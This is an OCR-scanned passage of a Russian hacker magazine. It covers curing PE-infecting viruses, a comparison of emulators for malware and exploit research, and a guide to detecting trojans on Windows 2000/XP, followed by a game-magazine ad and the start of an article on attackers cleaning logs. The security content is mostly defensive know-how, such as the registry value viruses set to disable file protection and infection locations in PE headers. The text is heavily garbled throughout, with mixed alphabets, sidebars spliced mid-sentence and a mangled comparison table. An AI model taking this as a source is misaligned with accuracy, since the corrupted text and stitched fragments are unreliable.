meee ай приплюсовать к ранее полученной 
патчи и фа- циофре. Если ты найдешь два заголов- 
ервол. ка в файле, то это тоже ничего хоро- 
шего не предвещает. Здесь подойдет 
hiew или любой другой полюбивший- 
ся тебе НЕХ-редактор. 
Размер паразита достигает десятков 
Зло-прог- килобайт, поэтому его активность не 
Ayr iperncr= должна пройти незамеченной у опыт- 
рировать ного пользователя. Можно сравнить 
себя как файл с оригиналом или воспользовать- 
службы, что i 
приводит к ся дисковыми ревизорами типа ADinf. 
отсутствию В случае заражения простым виру- 
их в списке 
процессов. сом вылечить программы элементар- = 
но. Если вирус никак не шифрует пе- Вот он, легендарный WinCIH, один из лучших вирусов XX века 


ремещенное начало жертвы и копиру- 
ет его в конец Cpaiina, то надо выпол- 
нить следующие действия: 

@. Найти второе вхождение симво- 
лов MZ (первые будут в самом начале 
файла) 

@. По смещению 3Ch от второго MZ 
проверить РЕ-сигнатуру 

@. Уточнить еще несколько уникаль- 
ных значений для РЕ-заголовка (нап- 
ример, названия секций или сочетание 
NT Header Size, Object align, File align) 

@. Скопировать участок от MZ go 
конца файла поверх кода вируса 

©. Обрезать файл go его натураль- 
ного размера, то есть до второго MZ 

Выполнение третьего пункта не обя- 
зательно, но желательно, чтобы удос- 
товериться в том, что ты нашел имен- 
но РЕ-заголовок. Рассказывать об 
особенностях виндового срормата я 
не буду, так как этому можно посвя- 


*.ехе - явное свидетельство о наличии вируса в файле 
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тить целую книгу, HO Ha диск мы пос- 
тарались выложить несколько мануа- 
лов на эту тему. Как ты заметил, это 
был самый простой вариант, ну а бо- 
лее сложные вирусы надо основа- 
тельно изучать, чтобы не искалечить 
‚ехе’шники. Путь для тех, кто не любит 
трудностей, - это отослать паразита в 
антивирусную лабораторию. 

В заключение хочу рассказать о низ- 
коуровневых вирусах. Все они распро- 
страняются, модифицируя критичные 
поля РЕ-заголовка для инъекции свое- 
го кода жертве. Методов инфицирова- 
ния очень много, вирусы могут пря- 
таться в пространстве между заголов- 
ком и первой секцией, равномерно 
распределяться в пустотах между сек- 
циями, могут создавать секцию в са- 
MOM начале или в конце файла ит.д. 
Подавляющее большинство современ- 
ных вирусов расширяют последнюю 
секцию и лезут туда. Такие экземпля- 
ры выдают себя рядом признаков. 

Самым ярким свидетельством болез- 
ни является нестандартная точка вхо- 
да. В нашем случае она будет указы- 
вать почти на самый конец последней 
секции (именно там живут 90% виру- 
сов). Окончательный диагноз можно 
поставить, если имеется и разрешение 
на запись в это место, однако \Х-коде- 
ры смекнули, что это дело слишком 
опасное, и теперь оставляют адрес 
Entry point в покое, вставляя, однако, 
туда джамп на нехороший код. Это и 
есть вторая подозрительная особен- 
ность. Кстати, переход может быть сов- 
сем не на последние байты срайла, но и 
почти в самое начало, после таблицы 
объектов, в случае с записью между 
заголовком и секциями. Многие остав- 
ляют автоградры в неиспользуемых по- 
лях РЕ - что-то типа “|_hate_world” или 
“diel.0". Наводит на размышления нес- 
тандартный адрес загрузки программы. 
Полиморсорики могут вставлять кучу 
мусора и ничего не делающие после- 
довательности команд. Если ты ви- 


дишь в коде, написанном Ha acme, push 
еах рор еах, то это явно кто-то шифру- 
ется. Хочу заметить, что подобное яв- 
ление для Delphi стандартно. Ну и, ко- 
нечно, не могу обойти стороной неза- 
шисфрованные строки. Наличие в фай- 
ле "*.ехе", “virus” и тому подобных пос- 
ледовательностей красноречиво гово- 
рит о намерениях этой программы. Ви- 
русы обычно ищут адреса нужных им 
АРНфункций и делают это по их имени 
- в итоге, исследователь может выя- 
вить наличие в неположенных местах 
строк CreateFileA, WriteFile, FindFileA, 
GetProcAddress и т.д. Неположенные 
места - это все места, кроме директо- 
рии импорта. Размер файла при зара- 
жении может не изменяться, если ви- 
рус раскидывает себя по пустым мес- 
там. Для анализа заголовка прекрасно 
подойдет все тот же PE Tools. Те, кто 
знает виндовый стандарт исполнимых 
срайлов, смогут извлечь много инфор- 
мации о вирусе, если он там есть. Но 
лучшим способом определения заразы 
является сопоставление оригинала с 
возможной жертвой. 

Лечение этого вида вирусов в общем 
случае сводится к удалению плохого 
кода и исправлению значений заголов- 
ка. Универсальных алгоритмов, однако, 
не существует, поскольку не существу- 
ети универсальных алгоритмов зара- 
жения :). Вирусы могут всячески сопро- 
тивляться своему изгнанию из носите- 
ля, например, шифровать некоторые 
его участки, для того чтобы жертва 
«умерла» после исцеления. Единствен- 
ный путь, дающий верный метод враче- 
вания, - это изучение алгоритма вируса. 


ПОСЛЕДНЕЕ СЛОВО 

m К сожалению, объема статьи ката- 
стродфически не хватает для столь 
серьезной и обширной темы. Дам те- 
бе один совет: вирусов пугаться не 
надо - их надо изучать. Если ты узна- 
ешь о них все, то и система будет аб- 
солютно цела. 


Размер файла при заражении может не 
изменяться, если вирус раскидывает себя 
по пустым местам. 
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Именно сюда - между РЕ-заголовком и началом секций - может влезть вирус 
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Крис Касперски aka мыщьх 


ини ние 
ИНСТРУМЕНТАРИЙ 


ХАКЕРА 
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СРАВНИТЕЛЬНЫЙ АНАЛИЗ ЭМУЛЯТОРОВ 


есколько лет назад основным оружием хакера были дизассемблер и отладчик. Теперь к ним добавился еще и 
эмулятор, открывающий перед кодокопателями поистине безграничные возможности. 


юбая операционная 


система имеет свои 


особенности. Поведе- 


ние программы, запу- 
щенной под Windows 
Эх, может существенным образом от- 
личаться от ее поведения под 
Windows МТ. Зоопарк *пх-систем и ге- 
нетически мутированных клонов луч- 
ше вообще не вспоминать :). Тому, 
кто занимается сетевой безопас- 
ностью, необходимо иметь, по мень- 
шей мере, три системы: Windows МТ, 
Linux и FreeBSD, хотя и другие сфлаг- 
маны рынка не помешают. Многие 
уязвимости (в частности, ошибки пе- 
реполнения) проявляются только на 
строго определенных версиях оси и 
отсутствуют на всех остальных. А раз 
так, написанием и отладкой эксплои- 
та абы на чем не займешься. Но пос- 
тоянно переставлять свою рабочую 
ОС - чудовищная потеря времени и 
риск потери данных! К тому же, crash- 
тесты на переполнение, заканчиваю- 
щиеся сбросом дампа ядра, - хоро- 
ший способ превратить файловую 
систему в мешанину. Конечно, поте- 
рянные данные можно полностью 
или частично восстановить, но нужно 
иметь за плечами гигантский опыт 
борьбы с разрушениями. Вот и прихо- 
дится заблаговременно подключать 
отдельный винчестер и зверски над 
ним издеваться :), погружая файло- 
вую систему в небытие и возвращая 
ее к жизни. Эксперименты с вирусами 
и эксплоитами также следует прово- 
дить на отдельной, полностью изоли- 
рованной от внешнего мира машине, 
поскольку система разграничения 
доступа, встроенная в Windows МТ и 
*пх-системы, далеко не безупречна и 
малейшая небрежность, допущенная 
исследователем, может обернуться 
тотальным разрушением. 
Традиционно эти задачи решались 
путем приобретения нескольких 
компьютеров или, на худой конец, 
множества жестких дисков, попере- 
менно подключаемых к одной маши- 
не. Но это дорого, неудобно и неэсте- 
тично. К тому же, жесткие диски 90- 
вольно скептически относятся к перс- 
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пективе кочевой жизни, покрываясь 
"бэдами" при каждом ударе :). 


СПАСЕНИЕ - В ЭМУЛЯТОРАХ 

m Теперь этот кошмар мало-пома- 
лу отходит в прошлое. Мощь совре- 
менных процессоров позволяет эму- 
лировать персональный компьютер 
целиком, выполняя на нем програм- 
мы в реальном времени и с приемле- 
мой скоростью. Эмуляторы плодят- 
ся, как ежики после дождя. VMWare, 
Virtual РС, Bochs и DOS-Box... Какой 
выбрать? Большинство публикаций, 
посвященных эмуляторам, ориенти- 
ровано на геймеров и системных ag- 
министраторов. Первым важна ско- 
рость и качественный звук, вторым - 
наличие механизмов взаимодей- 
ствия между виртуальными машина- 
ми. Хакерам же до этого всего дела 
нет. Главное, чтобы работал Айс и 
встроенный (build-in, internal, inte- 
grated) отладчик. 


МИНИМАЛЬНЫЕ ТРЕБОВАНИЯ 

ш Большинство эмуляторов предъ- 
являют весьма умеренные требова- 
ния к аппаратуре. Для комфортной 
работы с Windows 2000 и FreeBSD 
4.5 процессора РепНит-Ш 733 MHz 
будет вполне достаточно (в частнос- 
ти, VMWare превращает его в 


Pentium Ш 336 MHz, a Virtual РС - в 
Pentium 11187 MHz). 

Требования к памяти более жесткие. 
Необходимо иметь минимум 128 
Мбайт для основной операционной 
системы (называемой "хозяйкой", от 
«host») и по 128-256 Мбайт для каж- 
дой из одновременно запущенных 
виртуальных машин ("гостей"). Есте- 
ственно, количество потребляемой 
памяти определяется типом эмулируе- 
мой операционной системы. Так, если 
это простушка MS-DOS, то для нее и 4 
Мбайт вполне хватит. На 256 Мбайт 
уже можно сносно эмулировать 
Windows 2000/ХР/2003, запущенной 
поверх Win2k или аналогичной опера- 
ционной системы. 

Объем физического жесткого диска 
в общем-то некритичен. Виртуальные 
машины создаются отнюдь не для на- 
копления данных и за редким исклю- 
чениям не содержат ничего, кроме 
операционной системы в типичном 
варианте поставки и джентльменско- 
го набора сопутствующих ей прило- 
жений, что в совокупности отнимает 
не более гигабайта дискового прост- 
ранства. Причем ни один из извест- 
ных мне эмуляторов не требует непос- 
редственного доступа к физическому 
жесткому диску. Вместо этого образ 


виртуального винчестера размещает- 


DOS-BOX 


ся в обыкновенном сфайле, полностью 
подчиняющемся хозяйской операци- 
онной системе. 

Виртуальные диски бывают, по мень- 
шей мере, двух типов: фиксированные 
и динамические. При создании сфикси- 
рованного диска эмулятор сразу же 
"растягивает" сфайл-образ на весь тре- 
буемый объем, даже если тот не со- 
держит никакой полезной инфрорма- 
ции. Динамические диски, напротив, 
хранят в образе лишь реально задей- 
ствованные виртуальные сектора, уве- 
личивая объем образа по мере его за- 
полнения актуальными данными. 
Вместо того чтобы поровну дробить 
свой физический жесткий диск между 
виртуальными машинами, можно вы- 
делить каждой из них практически все 
свободное физическое пространство. 
Но это кажущаяся простота. Произво- 
дительность динамических дисков 
намного ниже, чем фиксированных! 
Также они подвержены внутренней 
фрагментации (не путать с фрагмента- 
цией срайла-образа и фрагментацией 
эмулируемой срайловой системы). И 


хотя некоторые из эмуляторов, в част- 
ности VMWare, содержат встроенные 
десррагментаторы, это не решает 
проблемы. К тому же, формат динами- 
ческих дисков не стандартизован и об- 
разы различных эмуляторов категори- 
чески не совместимы друг с другом. 

Остальное оборудование может 
быть любым - это на скорость эмуля- 
ции практически никак не влияет. 


ЭМУЛЯТОР ДЛЯ СЕБЯ 

При выборе подходящего эмуля- 
тора хакеры обычно руководствуются 
следующими критериями: защищен- 
ностью, расширяемостью, откры- 
тостью исходных текстов, качеством и 
скоростью эмуляции, наличием встро- 
енного отладчика и гибкостью меха- 
низмов работы со snap-shot'amn. 


ЗАЩИЩЕННОСТЬ 

Запуская агрессивную программу 
на эмуляторе, очень сложно отде- 
латься от мысли, что в любой момент 
она может выйти из-под контроля, ос- 
тавляя за собой длинный шлейф раз- 


рушений. Эти опасения вполне обос- 
нованны. Многие из эмуляторов (DOS- 
BOX, Virtual PC) содержат "дыры", 
позволяющие эмулируемому коду 
напрямую обращаться к памяти само- 
го эмулятора. Например, вызывать от 
его имени и с его привилегиями про- 
извольные АР!-функции хозяйской 
операционной системы :). Однако 
"пробить" эмулятор может только 
специальным образом спроектиро- 
ванная программа, так что при всей 
теоретической обоснованности угро- 
зы вероятность ее практической реа- 
лизации близка к нулю - эмуляторы 
не настолько популярны, чтобы агрес- 
соры взялись за них всерьез. 

А вот сетевое взаимодействие - дру- 
гое дело. Эмуляция виртуальной ло- 
кальной сети сохраняет все уязвимости 
хозяйской операционной системы, и се- 
тевой червь может ее легко атаковать! 
Поэтому хозяйская операционка из 
виртуальной локальной сети должна 
быть в обязательном порядке исключе- 
на. Естественно, такое решение сущест- 
венно затрудняет общение виртуаль- 
ных машин с внешним миром, и поэто- 
му им часто пренебрегают. Кстати, пер- 
сональные брандмауэры в большин- 
стве своем не контролируют виртуаль- 
ные сети и не защищают от вторжения. 

Некоторые эмуляторы позволяют 
взаимодействовать с виртуальными 
машинами через механизм общих па- 
пок. При этом папка хозяйской ОС ви- 
дится как логический диск или сете- 
вой ресурс. При всех преимуществах 
такого подхода он интуитивно небезо- 
пасен и в среде хакеров не сыскал 
особенной популярности. 


РАСШИРЯЕМОСТЬ 
Профессионально ориентирован- 
ный эмулятор должен поддерживать 
возможность подключения внешних 
модулей, имитирующих нестандарт- 
ное оборудование (например, HASP). 
Особенно это актуально для иссле- 
дования защит типа Star Force 3, 
напрямую взаимодействующих с ап- 
паратурой и привязывающихся к тем 
особенностям ее поведения, о кото- 
рых штатные эмуляторы порой даже 


и не подозревают. 


» 


Softice, за- 
пущенный 
под эмуля- 
тором, не 
заморажи- 
вает основ- 
ную систе- 
му, не за- 
тыкая 
WinAmp, не 
разрывая 
соединения 
с интерне- 
том, не за- 
мораживая 
часы сис- 
темного 
времени и 
оставляя 
MSDN дос- 
тупным! 


Для загруз- 
ки вирту- 
альной ма- 
шины с CD- 
ROM необ- 
ходимо вой- 
ти в вирту- 
альный 
BIOS Setup 
(B VMWare 
это делает- 
ся нажати- 
ем клавиши 
F2 на на- 
чальной 
заставке) и 
в меню boot 
вытянуть 
CD-ROM на- 
верх. 


no 
= 
о 
[= 
г 
= 
< 
<= 
< 
x 
< 
- 
< 


wn 
= 
о 
a 
г 
= 
< 
= 
< 
Е 
< 
- 
< 


Один и тот 
же диско- 
вый образ 
может быть 
подключен 
к несколь- 
ким вирту- 
альным ма- 
шинам - 
удобно для 
передачи 
файлов 
между ними 
или совме- 
стного ис- 
пользова- 
ния прило- 
жений. 


Все описы- 
ваемые 
эмуляторы 
ты найдешь 
на нашем 
диске. 
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Некоторые из эмуляторов расширяе- 
мы, некоторые - нет. Но даже у расши- 
ряемых степень маневренности и глу- 
бина конфигурабельности довольно 
невелики и поверхностно документиро- 
ваны (если документированы вообще). 
Наверное, это происходит оттого, что 
фактор расширяемости реально требу- 
ется очень и очень немногим. Эмулято- 
ры ведь пишут не для хакеров! А жаль. 


OTKPbITOCTb 
ИСХОДНЫХ ТЕКСТОВ 

Наличие исходных текстов час- 
тично компенсирует свинское каче- 
ство документации и плохую расши- 
ряемость эмулятора. Если подопыт- 
ная программа отказывается выпол- 
няться под эмулятором, исходные 
тексты помогут разобраться в ситу- 
ации и устранить дефект. Можно ос- 
настить эмулятор всем необходи- 
мым инструментарием. Например, 
дампером памяти или back {гасег'ом, 
позволяющим прокручивать выпол- 
нение программы в обратном поряд- 
ке (между прочим, классная вещь 
для взлома). Также есть возмож- 
ность оперативного добавления не- 
документированных машинных ко- 
манд или наборов инструкций но- 
вых процессоров. 

К сожалению, коммерческие эмуля- 
торы распространяются без исходных 
текстов, а эмуляторы Open Source все 
еще не вышли из юношеского воз- 
раста и для решения серьезных за- 
дач, увы, непригодны. 


КАЧЕСТВО ЭМУЛЯЦИИ 

Какой прок от эмулятора, если на 
нем не запускается 5о се? Можно, 
конечно, использовать и другие от- 
ладчики, например Olly Debugger, но 
их возможности более ограниченны, а 
на некачественных эмуляторах неко- 
торые из защищенных программ 
просто не идут! 

Для увеличения скорости эмуляции 
многие из разработчиков сознательно 
усекают набор эмулируемых команд, 
поддерживая только наиболее акту- 
альные из них (это относится к приви- 


BOCHS 


легированным командам защищенного 
режима, командам математического 
сопроцессора включая "мультимедий- 
ные" и некоторым редкоземельным ко- 
мандам реального режима). Служеб- 
ные регистры, сфлаги трассировки и 
другие подобные им возможности ча- 


DOS-BOX Bochs Microsoft Virtual PC VM Ware 
бесплатность да нет нет 
исходные тексты да нет нет 
кол-во эмулируемых 
процессоров | 1,2, 4,8 у 1 
эффорективная 
тактовая частота на 13,17 MHz 1,49 MHz 189 MHz 336 MHz 
Pentium III 733 
расширяемость нет частично нет частично 
поддержка динами- 
ческой эмуляции частично нет да да 
процессора 

IDE/SCSI 
IDE, IDE, динамические у 
виртуальные динамические и 
жесткие диски НЕТ И ep ` ны > фиксированные 
образы 
поддержка зо -се нет частично нет да 
встроенный да, но требуется ЕТ _ 
отладчик перекомпиляция 
работа со shap- 
МИ нет нет нет да 
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ще всего остаются незадействованны- 
ми. Тем не менее, такие эмуляторы при- 
годны не только для запуска игрушек! 
Их можно использовать как "карантин- 
ную" зону для проверки свежераздо- 
бытых программ на вирусы или как по- 
допытную мышь GNA экспериментов с 
тем же Disk Editor'om. 

Коммерческие эмуляторы в боль- 
шинстве своем используют меха- 
низмы динамической эмуляции, эму- 
лируя только привилегированные 
команды. А все остальные выполня- 
ются на "живом" процессоре - в су- 
меречной зоне изолированного ag- 
ресного пространства, окруженной 
частоколом виртуальных портов, 
что не только существенно увели- 
чивает производительность, но и 
автоматически добавляет поддерж- 
ку всех новомодных мультимедий- 
ных команд. Разумеется, при ycno- 
вии что их поддерживает твой ‹фи- 
зический процессор. 

Между тем, в обработке исключи- 
тельных ситуаций ("экскепшенами"), 
воздействиях команд на срлаги, недо- 
пустимых способах адресации эмуля- 
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торы (даже динамические) зачастую 
ведут себя совсем не так, как настоя- 
щий процессор, и защитный код мо- 
жет выяснить это. Впрочем, если за- 
щищенная программа не будет рабо- 
тать под эмулятором, это сильно воз- 
мутит легальных пользователей. 


ВСТРОЕННЫЙ ОТЛАДЧИК 
Защищенные программы всячески 

противостоят отладчикам, дизассемб- 
лерам, дамперам и прочему хакерско- 
му оружию. Как правило, до нулевого 
кольца дело не доходит, хотя некото- 
рые защиты (например, ех{гете рго- 
tector) работают и там. Существуют 
десятки, если не сотни, способов сор- 
вать отладчику крышу, и противосто- 
ять им достаточно трудно. 

Могущество эмулятора как раз и зак- 
лючается в TOM, что OH полностью KOHT- 
ролирует выполняемый код и обычные 
антиотладочные приемы в его случае 
не срабатывают. Аппаратные ограниче- 
ния эмулируемого процессора на сам 
эмулятор не распространяются. Коли- 
чество "аппаратных" точек останова не 
обязано равняться четырем, как на 
х86. При необходимости эмулятор мо- 
жет поддерживать тысячу или даже 
миллион точек останова, причем усло- 
вия их срабатывания могут быть сколь 
угодно извращенными. 

Естественно, для этого эмулятор 
должен быть оснащен интегриро- 
ванным отладчиком. Любой другой 


VMWARE 


отладчик, запущенный под эмулято- 
ром, никаких дополнительных преи- 
муществ не получает. Возможности 
имеющихся интегрированных отлад- 
чиков достаточно невелики и обес- 
печивают ничуть не лучшую функ- 


циональность, чем debug.com, а не- 
редко существенно уступают ему. 
Поэтому к ним стоит прибегать лишь 
в крайних случаях, когда обыкно- 
венные отладчики с защитой уже не 
справляются. М 


НАЙТИ И УНИЧТОЖИТЬ! ) 


Крис Касперски aka мыщьх 


НАЙТИ 
И УНИЧТОЖИТЬ: 


РУКОВОДСТВО ПО БОРЬБЕ С ВИРУСАМИ И ТРОЯНАМИ 
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перационные системы 


разрослись gO неверо- 


9 семейства Windows 


ятных размеров, прев- 


ратившись в модель 
настоящего государства в миниатю- 
ре. Количество файлов, хранящихся 
под капотом жесткого диска, вполне 
сопоставимо с численностью насе- 
ления какой-нибудь европейской 
страны наподобие Швейцарии или 
Польши. Существуют сотни тысяч 
мест, пригодных для внедрения ви- 
руса, и в этих условиях ему ничего 
не стоит затеряться. 

Никто не в состоянии проанализи- 
ровать все имеющиеся в его распо- 
ряжении исполняемые сфайлы, дина- 
мические библиотеки, ОСХ-компонен- 
ты ит.д. Поэтому гарантированно об- 
наружить зловредный код методом 
тыка невозможно, особенно на ран- 
них стадиях, когда заражено неболь- 
шое количество файлов. Однако сто- 
ит вирусу поразить системный файл 
или специально подброшенную gpo- 
зофилу (рано или поздно это сдела- 
ет), как он тут же выдаст себя с rono- 
вой! С неразмножающимися троянс- 
кими программами дела обстоят нам- 
ного сложнее. Засевший в укромном 
месте троян может прятаться годами, 
ничем не выдавая своего присут- 
ствия, а затем в один прекрасный мо- 
мент неожиданно проснуться и сде- 
лать из винчестера винегрет. 

Это не означает, что ручной поиск 
бесполезен. Просто не стоит переоце- 
нивать его возможности... 


ЕСЛИ ВДРУГ ОТКРЫЛСЯ ЛЮК 
м Вирусы и троянские программы 
чаще всего пишутся начинающими 
программистами, не имеющими адек- 
ватного опыта проектирования и 
практически всегда допускающими 
большое количество сфатальных оши- 
бок. Из-за этого самочувствие зара- 
женной системы резко ухудшается: 
появляются сообщения о критических 
ошибках в самых неожиданных мес- 
тах, полностью или частично наруша- 
ется работоспособность некоторых 
приложений. Время загрузки опера- 
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ционной системы значительно воз- 
растает. Не удается выполнить про- 
верку диска и/или его дефрагмента- 
цию. Производительность падает. 

Естественно, все эти признаки мо- 
гут вызываться волне легальным, но 
некорректно установленным прило- 
жением или аппаратными неисправ- 
ностям. Не стоит в каждом баге ви- 
деть вирус. Вирусофобия - опасная 
вещь, намного более опасная, чем 
вирусы, и еще никого она не доводи- 
ла go добра. 


НОВЫЕ ПРОЦЕССЫ 

m Троянские программы, сделанные 
в виде автономного исполняемого 
файла и никак не скрывающие своего 
присутствия в системе (а большин- 
ство из них именно так и устроено), 
легко обнаруживаются Диспетчером 
Задач или любой другой утилитой, 
отображающей список активных про- 
цессов, к примеру, FAR'om. Причем 
FAR даже более предпочтителен, пос- 
кольку появляется все больше троян- 
цев, удаляющих себя из Диспетчера 
Задач (грамотный стелс будет неви- 
денив FAR'e - прим. AvaLANCche'a). 

Зловредный процесс внешне ничем 
не отличается от всех остальных про- 
цессов, и, чтобы разоблачить его, тре- 
буется знать системные процессы 
своей системы. Свежеустановленная 
Windows 2000/XP создает следующие 
процессы: internat.exe (русификатор), 
smss.exe (сервер менеджера сеансов), 
csrss.exe (сервер подсистемы Win32), 
winlogon.exe (программа регистрации 
в системе и сетевой ОПЕ-агент), servic- 
е5.ехе (диспетчер управления серви- 
сами), |[5а5$.ехе (сервер защитной под- 
системы), Svchost.exe (контейнер для 
служб и сервисов), spoolsv.exe (дис- 
петчер очереди печати), regsvc.exe 


(регистратор сервисов), mstask.exe 
(планировщик) и explorer.exe (оболоч- 
ка - великий и ужасный Проводник). 

При установке новых приложений и 
драйверов этот список может быть 
значительно пополнен. К сожалению, 
Диспетчер Задач не отображает пол- 
ного пути к исполняемому срайлу про- 
цесса, заставляя теряться в догадках, 
какому приложению он принадлежит. 
Попробуй поискать cpaiin по его име- 
ни на диске или запусти FAR. Подог- 
нав курсор к соответствующему про- 
цессу в списке, нажми <F3>, и FAR co- 
общит полный путь к нему. Файлы, 
находящиеся в каталоге легально ус- 
тановленного приложения, скорее 
всего этому приложению и принадле- 
жат. Файлы, находящиеся в систем- 
ном каталоге Windows, могут принад- 
лежать кому угодно, и, чтобы избе- 
жать путаницы, возьми за правило 
каждый раз при установке нового 
приложения обращать внимание на 
процессы, которые оно добавляет. 

Появление нового процесса, не свя- 
занного ни с одним из установленных 
приложений, - верный признак троя- 
нского внедрения. Скорми связанный 
с ним исполняемый срайл свежей вер- 
сии любимого антивируса. 


ПОТОКИ И ПАМЯТЬ 

m В последнее время вирусописате- 
ли все больше тяготеют к функциям 
CreateRemoteThread и 
WriteProcessMemory, позволяющим 
внедряться в адресные пространства 
уже запущенных процессов. Это зна- 
чительно усложняет выявление зара- 
зы, и приходится прибегать к дедовс- 
ким средствам, активно используе- 
мым еще во времена MS-DOS. Тогда 
системные операторы следили за ко- 
личеством свободной оперативной 


Сообщение о критической ошибке в Windows 2000 


памяти, скрупулезно записывая пока- 
зания утилиты тет на бумажку :). Хо- 
тя простушку тет было легко обма- 
нуть, на это были способны лишь нем- 
ногие из вирусов. 

С тех пор многое изменилось. Опе- 
рационные системы стали сложнее, 
но вместе с тем и умнее. Контроль за 
системными ресурсами значительно 
ужесточился, и прямой обман стал 
практически не возможным. Дождав- 
шись окончания загрузки системы, 
запусти Диспетчер Задач и запомни 


(a лучше запиши) количество деск- 
рипторов, процессов, потоков и объем 
выделенной памяти. При внедрении 
всякой автоматически загружающей- 
ся программы эти показания неизбеж- 
но изменятся! 

Но изменение количества потоков в 
процессе работы с системой - вполне 
нормальное явление и само по себе 
еще ни о чем не говорит. Простой 
эксперимент. Запусти "Блокнот". Дис- 
петчер Задач сообщает, что в нем 
имеется всего лишь один поток, так? 


МНЕНИЕ ЭКСПЕРТА 


А теперь открой диалог "Сохранить 
как", и увидишь, как количество по- 
токов тут же поползет вверх. Один из 
них принадлежит драйверу звуковой 
карты, озвучивающему системные со- 
бытия, один - непосредственно само- 
му диалогу. Остальные (если они 
есть) - прочим системным функциям, 
выполняющим свой код в контексте 
данного процесса. 


КОНТРОЛЬ ЦЕЛОСТНОСТИ 
ФАЙЛОВ 

Операционные системы Windows 
2000/ХР оснащены специальными 
средствами проверки целостности ис- 
полняемых файлов, автоматически 
выполняющимися при всяком обра- 
щении к ним и при необходимости 
восстанавливающими искаженный 
файл. По умолчанию резервные ко- 
пии хранятся в каталогах WINNT\ 
System32\Dllcache и WINNT\ 
ServicePackFiles. 

У вируса есть два пути: либо отклю- 
чить SFC (за это отвечает ключ реест- 
ра HKEY_LOCAL_MACHINE\SOFT- 
WARE\Microsoft\Windows 
NT\CurrentVersion\Winlogon\SFCDisabl 
е), либо единовременно поразить и 
сам заражаемый срайл, и все его pe- 
зервные копии, так что надежность 
автоматической проверки весьма сом- 
нительна и лучше всего запускать 
SFC (sfc.exe) вручную с ключом 
/PURGECACHE. Тогда она очистит 
файловый кэш и затребует дистрибь- 
ютивный компакт-диск для его рекон- 
струкции, после чего выполнит скани- 
рование системных сфайлов на Npeg- 
мет поиска несоответствий. Но если 
после первой инсталляции в систему 
добавлялись те или иные пакеты об- 
новлений, утилита SFC либо вообще 
откажется перестраивать файловый 
кэш, либо выдаст большое количест- 
во ложных срабатываний, приводя 
обновленные сфайлы в их первоздан- 
ный вид, что явно не входит в твои 
планы. Поэтому всегда приобретай 
Windows с интегрированным Service 
Pack'om самой последней версии 
(именно интегрированным, а не прос- 
то записанным в отдельную директо- 
рию, чем славится большинство пира- 
тов) - там этих проблем нет. 

Также можно и нужно использовать 
и более продвинутые антивирусные 
средства, такие, как ADInf или AVP 
Disk Inspector, а если их нет - утилиту 
посимвольного сравнения сдфайлов 
FC.EXE, входящую в штатный комп- 


Большин- 


ство виру- 
сов и троя- 
нов можно 
обнаружить 
и нейтрали- 
зовать 
собствен- 
ными сила- 
ми. Доста- 
точно знать 
их симпто- 
мы. 


Если тро- 
ян/вирус не 
умеет скры- 
вать свой 
процесс, то 
он виден 
через стан- 
дартный 
Диспетчер 
Задач. 
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ATAKA HA WINDOWS 


(EN) ЗАЩИТА 


НАЙТИ И УНИЧТОЖИТЬ! ) 


лект поставки любой версии Windows. 
Только не запускай все эти програм- 
мы непосредственно из самой запус- 
каемой системы! Stealth-BupycoB nog 
Windows с каждым днем становится 
все больше, а методика их - маскиров- 
ки все изощреннее. 

Вопреки расхожему мнению 
Windows может загружаться и с CD. 
Прежде всего, на ум приходит 
Windows-PE - слегка усеченная вер- 
сия Windows ХР, официально распро- 
страняемая только среди партнеров 
Microsoft и в центрах сервисного обс- 
луживания. В открытую продажу она 
go сих пор не поступала, и, если тебе 
претит кормить пиратов (многие из 
которых к тому же и хамы :), восполь- 
зуйся бесплатным Bart's PE Builder'om 
( ), 
автоматически дформирующим загру- 
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ANTI-CRACKER SHIELD 


deel take 4 ape bees 


» 


зочный диск Ha основе любой версии 
от Windows 2000 $Р1 и старше. 

Кстати говоря, при желании можно и 
вовсе изъять жесткий диск из компь- 
ютера, разместив систему и все необ- 
ходимые для работы приложения на 
CD-ROM. Для записи временных сфай- 
лов сгодится виртуальный диск - 
вполне удачное решение для игровой 
платорормы. Теперь ни вирусы, ни об- 
рушения операционной системы не 
страшны! Аналогичным путем можно 
модернизировать и офисные компью- 
теры. Обрабатываемые файлы в этом 
случае придется либо централизован- 
но хранить на сервере (наиболее 
перспективный и экономичный путь), 


либо записывать на дискету, zip или 
CD-RW (чисто хакерский путь). 


НЕНОРМАЛЬНАЯ 
СЕТЕВАЯ АКТИВНОСТЬ 
Редкий троян может удержаться 

от соблазна передать награбленное 
добро по сети или установить систе- 
му удаленного администрирования. 
При этом на машине открываются 
новые порты или появляются соеди- 
нения, которые ты не устанавливал. 

Для просмотра перечня открытых 
портов и установленных соедине- 
ний можно воспользоваться утили- 
той netstat из штатного комплекта 
поставки Windows, запустив ее с 


ключом -а. К сожалению, она не вы- 
дает имени процесса, установивше- 
го данное соединение (а для поиска 
троянов это актуально), вынуждая 
искать более совершенный инстру- 
ментарий. Большой популярностью 
пользуется утилита TCPView Марка 
Руссиновича ( ), не 
только выводящая развернутую 
статистику, но и позволяющая Og- 
ним движением мыши закрыть лю- 
бое сетевое соединение. 

Еще лучше оградить свой 
компьютер персональным бранд- 
мауэром. Многие из брандмауэ- 
ров, кстати говоря, содержат сис- 


темы обнаружения вторжений и 
антивирусные модули. Брандмау- 
эр не только сообщает о подозри- 
тельных сетевых соединениях - 
он позволяет их блокировать, 
предотвращая утечку данных с 
твоего компьютера и выдавая 
предупредительные сообщения 
на ранних стадиях вторжения. 
Впрочем, брандмауэр - это еще не 
панацея, и он не может защитить 
от атак, которые совершаются не 
через него. Вирусы - не его спе- 
циализация, и в борьбе с ними он 


малоэфофективен. 
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2CD или DVD с каждым номером 


| В НОМЕРЕ: 


Tokyo Game Show 2004 
Эксклюзивный репортаж 

с выставки. Японская 
индустрия видеоигр 
открыла свои тайны нашим 
корреспондентам. 


Prince of Persia: 
Warrior Within 

Ubisoft готовит сногсшиба- 
тельный сиквел лучшей 
игры прошлого года. 
Мрачная атмосфера и 
идеально проработанная 
боевая система ждут вас. 


Star Wars: Battlefront 
Гемплей Battlefield 1942 + 
вселенная «Звездных войн» = 
великолепный многополь- 
зовательскии шутер. 


Rome: Total War 
Лучшая стратегия 2004 года 
даст’вам шанс покорить мир 
вместе с непобедимыми 

римскими легионами. 
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ы исти логи три раза в день!»›, «Уходя, он почистил за собой логи», «Заглянув в логи, администратор 
«¢ | обнаружил...» - едва ли не самые часто встречающиеся фразы в историях андеграунда. Чистка логов - 
гарантия безопасности взломщика и залог его спокойного сна. 


итая очередную хаке- 


рскую байку, а, может, 


и не байку, а преукра- 


° | шенную историю, я об- 


